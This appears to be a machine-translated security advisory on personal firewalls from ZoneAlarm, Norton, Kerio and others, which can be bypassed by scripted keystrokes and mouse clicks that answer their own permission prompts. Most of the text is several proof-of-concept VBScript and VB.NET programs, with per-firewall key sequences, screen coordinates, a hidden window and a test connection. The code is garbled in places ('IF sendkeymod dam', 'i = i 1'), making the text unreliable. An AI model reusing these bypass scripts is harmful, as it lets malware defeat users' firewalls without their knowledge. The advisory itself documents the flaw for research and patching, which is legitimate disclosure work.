Affected system:
ZONE LABS ZONEAlarm Pro 4.5.538.001
ZONE LABS ZONEAlarm Pro 4.5
Symantec Norton Personal FireWall 2004
Symantec Norton Personal FireWall 2003
Symantec Norton Personal FireWall 2002
Kerio Personal FireWall 4.1.2
Kerio Personal FireWall 4.1.1
Kerio Personal FireWall 4.1.0
description:
Most personal firewalls allow shortcuts or interface control communication.
Most personal firewall access implementation control has problems, and remote attackers can use this vulnerability to bypass firewall control by controlling mouse or delivery shortcuts, fully accessing the system.
Attackers can set a VBScript script that performs a multi-threaded self-instance and send a shortcut to the firewall when the first instance is connected to the Internet, which can cause control of firewall behavior, bypass control.
In addition, you can bypass by mouse controls, and the program does not use an actual multi-course, because some firewalls will directly interrupt the program execution, so the program uses a parameter to perform another example to implement, bypass firewall control.
With this problem, it can cause malicious procedures such as Trojans to perform server monitors or directly access the firewall without being prompted by the firewall.
<* Source: ferruh mavituna (
Ferruh@mavituna.com)
link:
Http://marc.theaimsgroup.com/?l=bugtraq&m=110478641332370&w=2
*>
testing method:
Police Operations (Methods) may have an aggressive, only for safety research and teaching. Users are at your own risk! Ferruh mavituna (
Ferruh@mavituna.com offers the following test method:
'********************************************************** **********
'// by ferruh mavituna
'// ferruh @ }Mavituna.com,
http://ferruh.mavituna.com
'********************************************************** **********
'// Date: 4/25/2004
'// Simple Poc for Skipping Zone Alarm Firewall with sendkeys and multithreading
'// Related Advisory: Not Published Yet
'********************************************************** **********
'Modified for Agnitium Outpost Firewall 2.1.303.4009 (314)
'TESTED: Agnitium Outpost FireWall 2.5.369.4608 (369)
'5/5/2004
'02.01.2005
'Ferruh mavituna
'Const delay = 1000
'Const Times = 1
'Const extradelay = 0
'********************************************************** ********** OPTION EXPLICIT
Dim Arglen, Shell, SendKeymod, I, Appname
Const delay = 1000
Const Times = 1
Const extradeLay = 0
Appname = wscript.scriptname
'SendKey
SendKeyMod = False
Arglen = wscript.arguments.length
IF arglen> 0 Then SendKeyMod = TRUE
Set shell = wscript.createObject ("wscript.shell")
IF sendkeymod dam
'First Sleep for a while
IF EXTRADELAY> 0 THEN WScript.sleep EXTRADELAY
'Force
While i i = i 1 WScript.sleep DELAY '1) first add it trusted Shell.sendKeys " {Tab}" 'Go Back ONCE Shell.sendKeys "{UP 2}" 'Go Up '1) Press Enter Shell.sendKeys "{entry}" 'enter Wend 'Exit 'Wscript.echo "exit!" WScript.quit 1 END IF 'Wscript.echo wscript.scriptfullname Call shell.run (appname & "/ send") 'Connect WScript.echo Connect (" http://ferruh.mavituna.com ") &" Mission Accomplished ... " Set shell = Nothing WScript.quit 1 Function Connect (Byval URL) DIM Web SET Web = CreateObject ("Microsoft.xmlhttp") Web.open "HEAD", URL, FALSE Web.send "" Connect = Web.GetallResponseHeaders SET Web = Nothing END FUNCTION ["Anti-Hacker.txt" (Text / Plain)] '********************************************************** ********** '// by ferruh mavituna '// ferruh @ }Mavituna.com, http://ferruh.mavituna.com '********************************************************** ********** '// Date: 4/25/2004 '// Simple Poc for ByPassing Multiple FireWall Products '// Related Advisory: Not Published Yet '********************************************************** ********** 'HISTORY '3/5/2004 'Added ZA '5/5/2004 'Added Kerio, Outpost '6/5/2004 'Added Kaspersky Anti-Hacker '********************************************************** ********** Option expedition DIM Arrkeys (5, 5), ArrDelays (5, 2), Arrregistry (5, 1), Intfirewall Const extradeLay = 0 Const determinefirewall = false 'Auto Determine Current Firewall '---------------------------------------------- 'Define Delays and Times for FireWalls '---------------------------------------------- '// firewalls 'ZoneAlarm Pro, 4.5.530 (TESTED Windows 2003 & WinXP) Const zoneAlarm = 0 'Kerio 4.0.14 Const Kerio = 1 'Agnitium Outpost FireWall 2.1.303.4009 (314) Const output = 2 'Kaspersky Anti-Hacker 1.5.119.0 Const Kaspersky = 3 'Select Active FireWall IntfireWall = Kaspersky '// configuration 'Kaspersky Anti-Hacker ArrDelays (Kaspersky, 0) = 1000 ArrDelays (Kaspersky, 1) = 1 'Define Keys for FireWalls Arrkeys (Kaspersky, 0) = "{entry}" IF determinefirewall then 'Todo: Read Registries and Dermine It! END IF Dim Arglen, Shell, SendKeymod, i, J, Appname Appname = wscript.scriptname 'SendKey SendKeyMod = False Arglen = wscript.arguments.length IF arglen> 0 Then SendKeyMod = TRUE Set shell = wscript.createObject ("wscript.shell") IF sendkeymod dam 'First Sleep for a while IF EXTRADELAY> 0 THEN WScript.sleep EXTRADELAY 'Force While I i = i 1 Wscript.sleep Arrdelays (intfirewall, 0) 'Send Keys For J = 0 to Ubound (Arrkeys, 2) IF arrkeys (intfirewall, j) <> "" "" "" "" END IF NEXT Wend 'Exit 'Wscript.echo "exit!" WScript.quit 1 END IF 'Wscript.echo wscript.scriptfullname Call shell.run (appname & "/ send") 'Connect WScript.echo Connect (" http://ferruh.mavituna.com ") &" Mission Accomplished ... " Set shell = Nothing WScript.quit 1 Function Connect (Byval URL) DIM Web SET Web = CreateObject ("Microsoft.xmlhttp") Web.open "HEAD", URL, FALSE Web.send "" Connect = Web.GetallResponseHeaders SET Web = Nothing END FUNCTION ["ZoneAlarm.txt" (Text / Plain)] '********************************************************** ********** '// by ferruh mavituna '// ferruh @ }Mavituna.com, http://ferruh.mavituna.com '********************************************************** ********** '// Date: 4/25/2004 '// Simple Poc for Skipping Zone Alarm Firewall with sendkeys and multithreading '// Related Advisory: Not Published Yet '********************************************************** ********** Option expedition Dim Arglen, Shell, SendKeymod, I Const delay = 10 Const Times = 15 'SendKey SendKeyMod = False Arglen = wscript.arguments.length IF arglen> 0 Then SendKeyMod = TRUE Set shell = wscript.createObject ("wscript.shell") IF sendkeymod dam While i i = i 1 WScript.sleep DELAY Shell.sendKeys "% r" 'Remember, Do Not Ask Again! Shell.sendKeys "% y" 'Click YES Wend 'Exit 'Wscript.echo "exit!" WScript.quit 1 END IF 'Wscript.echo wscript.scriptfullname Call shell.run ("skipza.vbs / send") 'Connect WScript.echo Connect (" http://ferruh.mavituna.com ") &" Mission Accomplished ... " Set shell = Nothing WScript.quit 1 Function Connect (Byval URL) DIM Web SET Web = CreateObject ("Microsoft.xmlhttp") Web.open "HEAD", URL, FALSE Web.send "" Connect = Web.GetallResponseHeaders SET Web = Nothing END FUNCTION [TestfireWall.txt "(Text / Plain)] '********************************************************** ********** '// by ferruh mavituna '// ferruh @ }Mavituna.com, http://ferruh.mavituna.com '********************************************************** ********** '// Date: 4/25/2004 '// Simple Poc for Skipping Zone Alarm Firewall with sendkeys and multithreading '// Simple FireWall Test File '// Related Advisory: Not Published Yet '********************************************************** ********** Option expedition Dim Shell, SendKeymod, Result Const url = " http://ferruh.mavituna.com " 'Connect WScript.echo "Now I'll Try to Connect To" & URL IF Connect (URL, Result) THEN Wscript.echo "Mission Accomplished ..., Here is the headers;" & vbnewline & result Else WScript.echo "OK, I COULDN '''t access to internet" END IF Set shell = Nothing WScript.quit 1 Function Connect (Byval Url, Byref Result) Connect = TRUE ON Error ResMe next Err.clear DIM Web SET Web = CreateObject ("Microsoft.xmlhttp") Web.open "HEAD", URL, FALSE Web.send "" Result = Web.GetallResponseheaders SET Web = Nothing IF Err <> 0 THEN CONNECT = FALSE END FUNCTION ["Norton.txt"] '******************************************** ********************* '// by ferruh mavituna '// ferruh @ }Mavituna.com, http://ferruh.mavituna.com '********************************************************** ********** '// Date: 4/25/2004 '// Simple Poc for Skipping Zone Alarm Firewall with sendkeys and multithreading '// Related Advisory: Not Published Yet '********************************************************** ********** Option expedition Dim Arglen, Shell, SendKeymod, I Const delay = 10 Const Times = 15 'SendKey SendKeyMod = False Arglen = wscript.arguments.length IF arglen> 0 Then SendKeyMod = TRUE Set shell = wscript.createObject ("wscript.shell") IF sendkeymod dam While i i = i 1 WScript.sleep DELAY Shell.sendKeys "% a" 'Remember, Do Not Ask Again! Shell.sendKeys "% o" 'Click YES Wend 'Customized for Norton FW by Oezguer Mavituna 'Exit 'Wscript.echo "exit!" WScript.quit 1 END IF 'Wscript.echo wscript.scriptfullname Call shell.run ("Skipza.vbs / Send") 'Connect WScript.echo Connect (" http://ferruh.mavituna.com ") &" Mission Accomplished ... " Set shell = Nothing WScript.quit 1 Function Connect (Byval URL) DIM Web SET Web = CreateObject ("Microsoft.xmlhttp") Web.open "HEAD", URL, FALSE Web.send "" Connect = Web.GetallResponseHeaders SET Web = Nothing END FUNCTION ["MouseControl.txt" (Text / Plain)] '********************************************************** ********** '// by ferruh mavituna '// ferruh @ }Mavituna.com, http://ferruh.mavituna.com '********************************************************** ********** '// Date: 5/19/2004 '// Simple Poc for ByPassing Multiple FireWall Products '// code: vb.net '********************************************************** ********** Private declare sub mouse_event lib "user32" (Byval DX AS / Long, Byval Dy As Long, Byval Cbuttons As Long, Byval Dwextrainfo As Long Private / Declare Sub Sleep Lib "Kernel 32" (Byval dwmilliseconds as ring) Private const mouseeventf_leftdown = & h2 Private const mouseeventf_leftup = & h4 Private const mouseeventf_middledown = & h20 Private const mouseeventf_middleup = & h40 Private const mouseeventf_rightdown = & h8 Private const mouseeventf_rightup = & h10 Private const SleepTime = 0.5 'as second Private const solutionmotion = true 'debug! 'Firewalls Const ZoneAlarm as integer = 0 'Set point DIM Arrfirewalls (1, 3) AS Integer DIM ActiveFireWall As INTEGER = ZoneAlarm Private sub setupfirewalls () 'Get Current Screen 'This Is Just Poc, Real World Example Should Automaticly Detect Installed Firewall, / Change Sleep Times, Car About Exact Positoin, Taskbar Position Etc. But it's easy to / WRITE A REAL WORLD EXAMPLE DIM Screeny As INTEGER = / Screen.primaryScreen.Bounds.Height Dim Screenx as in integer = / Screen.primaryScreen.bounds.width ArrfireWalls (ZoneAlarm, 0) = Screenx - 250 'x Remember! ArrfireWalls (ZoneAlarm, 1) = Screeny - 130 'Y Arrfirewalls (ZoneAlarm, 2) = Screenx - 190 'YES ArrfireWalls (ZoneAlarm, 3) = Screeny - 93 End Sub Private subfirewalltest_load (byval sender as system.object, byval e as /system.eventargs) Handles mybase.load 'Hide app Me.showintaskbar = false Me.visible = false 'Args DIM FLAGARG AS STRING = Application.executablePath If Environment.getCommandLineargs (). Length> 1 THEN 'Sleep; Sleep (SleepTime * 1000) 'TRY; Setupfirewalls () IF SlowMotion Then Sleep (1000) 'First Access Bypassfirewall (ARRFIREWALLS (ActiveFirewall, 0), Arrfirewalls (ActiveFireWall, 1)) IF SlowMotion Then Sleep (1000) Bypassfirewall (ARRFIREWALLS (ActiveFireWall, 2), Arrfirewalls (ActiveFirewall, 3)) 'Gain Access for http Sleep (300) IF SlowMotion Then Sleep (1000) Bypassfirewall (ARRFIREWALLS (ActiveFirewall, 0), Arrfirewalls (ActiveFireWall, 1)) IF SlowMotion Then Sleep (1000) Bypassfirewall (ARRFIREWALLS (ActiveFireWall, 2), Arrfirewalls (ActiveFirewall, 3)) 'Quit! Me.dispose () Else System.diagnostics.Process.Start (Flagarg, "Skipme") 'Access Internet IF Downloadurl () THEN Messagebox.show ("Successed!, FireWall Byparassed!", "FireWall Bypassed!", / MessageboxButtons.ok, MessageBoxicon.Warning) END IF Me.dispose () END IF End Sub 'Bypas poc Private sub bypassfirewall (byval x askER, BYVAL Y AS INTEGER) 'Save Old Positions for Return! DIM oldx as integer = cursor.position.x DIM oldy as integer = cursor.position.y 'Set new position Cursor.Position = New Point (x, y) 'Click Mouse_Event (MouseEventf_leftdown, 0, 0, 0, 0) Mouse_Event (MouseEventf_leftup, 0, 0, 0, 0) 'Return Cursor.Position = New Point (Oldx, Oldy) End Sub 'Connect Internet Private function downloadurl () AS Boolean Downloadurl = TRUE Try DIM WC as new system.net.WebClient () wc.downloadfile (" http://ferruh.mavituna.com "," c: /firewalltest.htm ") Catch MessageBox.show ("Can Not Connected!", "Not Connected!", MessageboxButtons.ok, / MessageBoxicon.Error) DownloadURL = FALSE END TRY END FUNCTION ["BypasssendKey.txt" (Text / Plain)] '********************************************************** ********** '// by ferruh mavituna '// ferruh @ }Mavituna.com, http://ferruh.mavituna.com '********************************************************** ********** '// Date: 4/25/2004 '// Simple Poc for ByPassing Multiple FireWall Products '********************************************************** ********** 'History '3/5/2004 'Added ZA '5/5/2004 'Added Kerio, Outpost '6/5/2004 'Added Kaspersky Anti-Hacker '5/9/2004 'Looknstop '5/20/2004 'Norton '********************************************************** ********** Option expedition DIM Arrkeys (5, 5), ArrDelays (5, 2), Arrregistry (5, 1), Intfirewall Const extradeLay = 0 Const determinefirewall = false 'Auto Determine Current Firewall '---------------------------------------------- 'Define Delays and Times for FireWalls '---------------------------------------------- '// firewalls 'ZoneAlarm Pro, 4.5.530 (TESTED Windows 2003 & WinXP) | www.zonelabs.com Const zoneAlarm = 0 'Kerio 4.0.14 Const Kerio = 1 'Agnitium outpost firewall 2.3.303.4009 (314) | www.agnitium.com Const output = 2 'Kaspersky Anti-Hacker 1.5.119.0 | www.kaspersky.com Const Kaspersky = 3 'Look' n 'Stop 2.04p2 | www.looknstop.com Const looknstop = 4 'Norton | www.norton.comconst norton = 5 'Select Active FireWall IntfireWall = ZoneAlarm '// configuration 'Define Keys, Delays, Repeat Times for FireWalls 'Kaspersky Anti-Hacker ArrDelays (Kaspersky, 0) = 400 ArrDelays (Kaspersky, 1) = 2 Arrkeys (Kaspersky, 0) = "{entry}" 'Just Say OK 'ZoneAlarm Arrdlays (zoneAlarm, 0) = 10 Arrdlays (ZoneAlarm, 1) = 15 Arrkeys (zoneAlarm, 0) = "% r" 'SELECT REMEMBER Arrkeys (ZoneAlarm, 1) = "% y" 'YES 'Outpost ArrDelays (outpost, 0) = 1000 ArrDelays (Outpost, 1) = 1 Arrkeys (outpost, 0) = " {tab}" 'Go Back ONCE Arrkeys (Outpost, 1) = "{UP 2}" 'Go Up Arrkeys (Outpost, 1) = "{enter}" 'Enter 'Kerio Arrdlays (Kerio, 0) = 100 Arrdlays (Kerio, 1) = 10 Arrkeys (Kerio, 0) = "" "'Space - Remember, Do Not Ask Again! Arrkeys (Kerio, 1) = "% P" 'YES 'Looknstop Arrdlays (LooknStop, 0) = 1000 ArrDelays (LooknStop, 1) = 1 Arrkeys (LooknStop, 0) = "(% {Tab})" Authorize Arrkeys (LooknStop, 1) = "{left}" 'left Arrkeys (LooknStop, 2) = "" "" " 'Norton ArrDelays (Norton, 0) = 100 Arrdlays (Norton, 1) = 5 Arrkeys (Norton, 0) = "% a" 'Allow Arrkeys (Norton, 1) = "% O" 'OK IF determinefirewall then 'Todo: Read Registries and Dermine It! END IF Dim Arglen, Shell, SendKeymod, i, J, Appname Appname = wscript.scriptname 'SendKey SendKeyMod = False Arglen = wscript.arguments.length IF arglen> 0 Then SendKeyMod = TRUE Set shell = wscript.createObject ("wscript.shell") if sendkeymod dam 'First Sleep for a while IF EXTRADELAY> 0 THEN WScript.sleep EXTRADELAY 'Force While I i = i 1 Wscript.sleep Arrdelays (intfirewall, 0) 'Send Keys For J = 0 to Ubound (Arrkeys, 2) IF arrkeys (intfirewall, j) <> "" " Shell.sendKeys Arrkeys (intfirewall, j) END IF NEXT Wend 'Exit 'Wscript.echo "exit!" WScript.quit 1 END IF 'Wscript.echo wscript.scriptfullname Call shell.run (appname & "/ send") 'Connect WScript.echo Connect (" http://ferruh.mavituna.com ") &" Mission Accomplished ... " Set shell = Nothing WScript.quit 1 Function Connect (Byval URL) DIM Web SET Web = CreateObject ("Microsoft.xmlhttp") Web.open "HEAD", URL, FALSE Web.send "" Connect = Web.GetallResponseHeaders SET Web = Nothing END FUNCTION ["Kerio.txt" (Text / Plain)] '********************************************************** ********** '// by ferruh mavituna '// ferruh @ }Mavituna.com, http://ferruh.mavituna.com '********************************************************** ********** '// Date: 4/25/2004 '// Simple Poc for Skipping Zone Alarm Firewall with sendkeys and multithreading '// Related Advisory: Not Published Yet '********************************************************** ********** 'Modified for Kerio 4.0.14 '5/5/2004 'Ferruh mavituna 'Const delay = 100 'Const Times = 10 '********************************************************** ********** Option expedition Dim Arglen, Shell, SendKeymod, I, Appname Const delay = 100 Const Times = 10 Appname = wscript.scriptname 'SendKey SendKeyMod = False Arglen = wscript.arguments.length IF arglen> 0 Then SendKeyMod = TRUE Set shell = wscript.createObject ("wscript.shell") IF sendkeymod dam While i i = i 1 WScript.sleep DELAY Shell.sendKeys "" 'Remember, Do Not ASK AGAIN! Shell.sendKeys "% P" 'Click YES Wend 'Exit 'Wscript.echo "exit!" WScript.quit 1 END IF 'Wscript.echo wscript.scriptfullname Call shell.run (appname & "/ send") 'Connect WScript.echo Connect (" http://ferruh.mavituna.com ") &" Mission Accomplished ... " Set shell = Nothing WScript.quit 1 Function Connect (Byval URL) DIM Web SET Web = CreateObject ("Microsoft.xmlhttp") Web.open "HEAD", URL, FALSE Web.send "" Connect = Web.GetallResponseHeaders SET Web = Nothing END FUNCTION Suggest: Temporary solution: If you don't install patch or upgrade immediately, NSFOCUS recommends that you take the following steps to reduce threats: * All allowed behaviors must ask for passwords. Vendor patch: Zone Labs --------- Zonelabs Team has provided the latest version to fix this vulnerability: http://www.zonelabs.com/
